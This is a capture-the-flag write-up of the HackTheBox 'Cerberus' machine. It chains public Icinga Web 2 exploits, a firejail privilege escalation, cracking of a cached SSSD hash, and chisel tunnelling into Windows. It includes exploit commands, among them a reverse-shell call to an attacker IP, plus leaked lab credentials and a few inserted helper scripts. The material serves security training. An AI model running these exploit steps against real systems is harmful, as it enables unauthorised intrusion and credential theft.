Cerberus

Cerberus is a hard Windows machine that mixes Linux and Windows. It involves exploiting Icinga Web 2 through two CVEs, an arbitrary file disclosure (CVE-2022-24716) and an authenticated RCE (CVE-2022-24715), giving a shell as www-data; escalating privileges on the Linux system through firejail (CVE-2022-31214) to become root; recovering a domain user's cached hash from SSSD as root, which is then used to get a shell on the Windows machine as matthew; and finally, after scanning the DC, finding ADSelfService running and vulnerable to an unauthenticated RCE (CVE 2022 4796), giving a shell as SYSTEM.

Reconnaissance

nmap

As usual, we start by scanning for open ports and the services running on them.

Cerberus is listed as a Windows machine, but the nmap scan reports a Linux host (Ubuntu) running an Apache web server on port 8080, which is confusing.

TTL enumeration

The default initial TTL value on Linux/Unix is 64, and on Windows it is 128.

Let's ping the machine's IP address, 10.10.11.205.

The TTL in the ping reply shows that the target machine is a Windows machine.

Let's run Wireshark, curl the Apache web server and look at the TTL in the captured packets.

First, run Wireshark

and select the VPN interface.

Then, once it is capturing packets, curl the machine's IP.

Let's explain what this means:

The default Linux TTL is 64, but every hop (router) that a packet from the Linux machine passes through decrements the TTL by 1.

In this case the TTL is decremented by 2 because the reply first passes through the HackTheBox VPN hop and then through the Windows host operating system.

So this confirms that a (Linux) virtual machine is running inside the Windows host operating system.
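The TTL reasoning above can be turned into a small helper. This is an added example, not part of the original writeup: it takes a TTL observed in a ping reply or a captured packet, picks the nearest common initial TTL (64 for Linux/Unix, 128 for Windows, 255 for network devices and a few other systems) and reports the implied OS family and hop count. The values 127 and 62 used at the bottom are assumed for illustration, since the screenshots with the real numbers are not on the page.

```shell
#!/bin/sh
# Added example (not from the original writeup): infer the likely initial TTL,
# OS family and hop count from an observed TTL.
# Assumption: the sender uses one of the common defaults (64, 128 or 255) and
# each router on the path decrements the TTL by exactly 1.

# ttl_guess OBSERVED_TTL -> prints "INITIAL HOPS FAMILY"
ttl_guess() {
    observed=$1
    case "$observed" in
        ''|*[!0-9]*) echo "usage: ttl_guess <observed-ttl>" >&2; return 2 ;;
    esac
    # The sender's initial TTL is the smallest common default >= observed value
    if [ "$observed" -le 64 ]; then
        initial=64; family="linux/unix"
    elif [ "$observed" -le 128 ]; then
        initial=128; family="windows"
    else
        initial=255; family="network-device/solaris"
    fi
    hops=$((initial - observed))
    printf '%s %s %s\n' "$initial" "$hops" "$family"
}

# Assumed values for the writeup's two observations: a ping reply with TTL 127
# (Windows host, 1 hop away) and an HTTP reply on 8080 with TTL 62 (Linux guest,
# 2 hops away, i.e. VPN hop plus the Windows host).
ttl_guess 127
ttl_guess 62
```

This is a heuristic, not proof: a TTL of 60 could be a Linux box 4 hops away or a Windows box 68 hops away, and initial TTLs can be changed by the administrator, so the hop count from a traceroute should agree with the inferred value before trusting the OS guess.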

Add icinga.cerberus.local to the hosts file.

Now browse to http://icinga.cerberus.local:8080/icingaweb2, which is given in the nmap scan.

Trying the default Icinga Web 2 credentials didn't work, and looking at the page source gives no information about the version.

So I searched for public exploits and found two interesting ones: CVE-2022-24715, an RCE that requires credentials, and CVE-2022-24716, a file disclosure vulnerability.

We will use the file disclosure vulnerability to leak interesting information.

Download the exploit from this link: https://github.com/JacobEbben/CVE-2022-24716

We don't know where the configuration files are located, so we go to the official Icinga documentation page https://icinga.com/docs/icinga-web/2.6/ and search for configuration. This gives us all the configuration file names and their path, /etc/icingaweb2/<configuration_file_name>.

python3 exploit.py http://icinga.cerberus.local:8080/icingaweb2 /etc/icingaweb2/roles.ini
python3 exploit.py http://icinga.cerberus.local:8080/icingaweb2 /etc/icingaweb2/resources.ini

and we have leaked the administrator credentials, so we can now log in.

Foothold on the Linux machine as www-data

Now that we have the credentials, we can use the other CVE to get Remote Code Execution (RCE).

We need to generate a PEM file first.

python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2 -I 10.10.14.177 -P 1234 -u matthew -p IcingaWebPassword2023 -e /home/kali/hackthebox/hard/cerberus/id_rsa

and boom, we've got a shell.

This is the Ubuntu version running on the machine.

Upgrade the dumb shell:

Privilege Escalation

Vulnerable firejail SUID binary

Listing all SUID binaries

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

Open this link, copy the Python exploit code and paste it into a Python file. I named it firejail_exploit.py, but you can name it whatever you want.

Now use the previous CVE again to get another shell as www-data in a second terminal.

When you get the shell, it is very important to upgrade it, otherwise this won't work.

After upgrading the shell, run the command

firejail --join=<number_given>

and then

su -

Escaping the Linux machine through SSSD cached credentials

If we take a look at /etc/hosts, we find the IP address of the domain controller.

Let's look at the running processes using the command

ps -ef --forest

We find that the sssd process is running. SSSD allows the Linux box to communicate with a domain, typically an LDAP (Lightweight Directory Access Protocol) server or an Active Directory domain.

I searched HackTricks for Linux Active Directory exploits, or ways to get valuable information about the Active Directory, and found this.

Looking at the contents of /var/lib/sss/secrets/secrets.db with strings, we don't find anything.

The .secret.mkey file doesn't exist, so I changed directory to the parent and found a couple of interesting db files.

The one with cache in its name looks more interesting.

To search through it we use the command strings

strings -m 10 cache_cerberus.local.ldb

Scrolling down in the results, we find a long string that looks like a hash.

I used an online service that identifies the hash type and also tries to crack it against a database: https://hashes.com/en/tools/hash_identifier

and it cracked the hash; the value is 147258369

and the username is matthew.
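The two manual steps above (strings over the cache file, then guessing the hash type) can be scripted, which is also what a defender would run to audit which cached credentials an SSSD host is holding. This is an added example and not part of the original writeup: it reproduces the effect of strings -m 10 with tr and awk so it does not need binutils, extracts crypt(3)-style strings, and names their format from the $id$ prefix. The sample cache file is constructed inline, the cachedPassword attribute name is an assumption about the SSSD cache layout, and the hash in it is a placeholder, not the hash from the machine.

```shell
#!/bin/sh
# Added example (not from the original writeup): find crypt-style hashes in a
# binary cache file and name their format from the modular-crypt prefix.

# printable_runs FILE MINLEN -> same idea as "strings -m MINLEN FILE"
printable_runs() {
    tr -c '[:print:]' '\n' < "$1" | awk -v n="$2" 'length($0) >= n'
}

# hash_family HASH -> format name from the "$id$" prefix, or "unknown"
hash_family() {
    case "$1" in
        '$1$'*)                  echo md5crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
        '$5$'*)                  echo sha256crypt ;;
        '$6$'*)                  echo sha512crypt ;;
        '$y$'*)                  echo yescrypt ;;
        *)                       echo unknown ;;
    esac
}

# find_cached_hashes FILE -> one "family hash" line per crypt-style string found
find_cached_hashes() {
    printable_runs "$1" 10 \
    | grep -o '\$[0-9a-zA-Z]\{1,2\}\$[./0-9A-Za-z$]\{20,\}' \
    | while read -r h; do
        printf '%s %s\n' "$(hash_family "$h")" "$h"
      done
}

# Constructed sample: a few non-printable bytes around a cachedPassword-style
# entry (attribute name assumed; hash value is a placeholder).
make_sample() {
    printf '\001\002\003name: matthew\000\000cachedPassword: $6$saltsalt$PLACEHOLDERHASHVALUEPLACEHOLDERHASHVALUE00\000\004' > "$1"
}

sample=${TMPDIR:-/tmp}/cache_demo.ldb
make_sample "$sample"
find_cached_hashes "$sample"
```

On a real host the same function would be pointed at /var/lib/sss/db/cache_<domain>.ldb; because SSSD only writes cachedPassword when offline credential caching is enabled, an empty result on a host that should not cache domain passwords is the expected, healthy outcome.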

We now have the username and password of a user on the Windows machine.

First let's check whether the WinRM port 5985 is open, and then we'll set up a reverse tunnel using chisel so we can connect to the Windows machine from our attack machine, since evil-winrm is not installed on the compromised Linux machine.

echo 1 > /dev/tcp/172.16.22.1/5985; echo $?

This command attempts to open a TCP connection to the specified IP address and port (172.16.22.1 on port 5985) using the /dev/tcp special file in Unix-like systems.

If the connection attempt succeeds (i.e., the port is open and accepting connections), the exit status ($?) is 0 and echo $? prints 0. If the connection attempt fails (i.e., the port is closed or unreachable), the exit status is 1 and echo $? prints 1.
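A bounded version of that check, added here as an example and not part of the original writeup. Two caveats the one-liner hides: /dev/tcp is interpreted by bash itself rather than being a file on disk, so the probe is run inside an explicit bash -c and works even when the calling shell is sh; and a filtered port (dropped SYN) makes the bare redirect hang for minutes, so the attempt is capped with timeout when it is available. The host and port at the bottom are the ones from the page.

```shell
#!/bin/sh
# Added example (not from the original writeup): a /dev/tcp port check with a
# timeout. Exit status 0 means a TCP handshake completed; anything else means
# refused, unreachable, filtered, or timed out.

# port_open HOST PORT [SECONDS] -> exit 0 if the port accepts a connection
port_open() {
    host=$1 port=$2 secs=${3:-3}
    if command -v timeout >/dev/null 2>&1; then
        timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        # No coreutils timeout: fall back to the plain check (may hang on filtered ports)
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# port_state HOST PORT -> prints "open" or "closed/filtered"
port_state() {
    if port_open "$1" "$2"; then
        echo open
    else
        echo "closed/filtered"
    fi
}

# The check from the writeup (domain controller, WinRM):
port_state 172.16.22.1 5985
```

The exit status alone cannot tell a closed port (immediate RST) from a filtered one (timeout); if that distinction matters, time the call: a refusal returns in milliseconds, a timeout only after the full limit.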

Reverse tunneling using chisel

Now let's use chisel to create a reverse tunnel so we can use evil-winrm from our attack machine to connect to the Windows machine at 172.16.22.1.

First we open a file share so we can transfer the chisel binary to the compromised Linux machine.

Using wget -r downloads all the files in the directory and its subdirectories.

  • 10.10.14.177: my Kali Linux attack box IP address

Foothold on the Windows machine as matthew

Now we can connect to the Windows machine using the credentials found in the SSSD cache and the reverse tunnel created by chisel.

You can find the user flag at /Users/Matthew/Desktop.
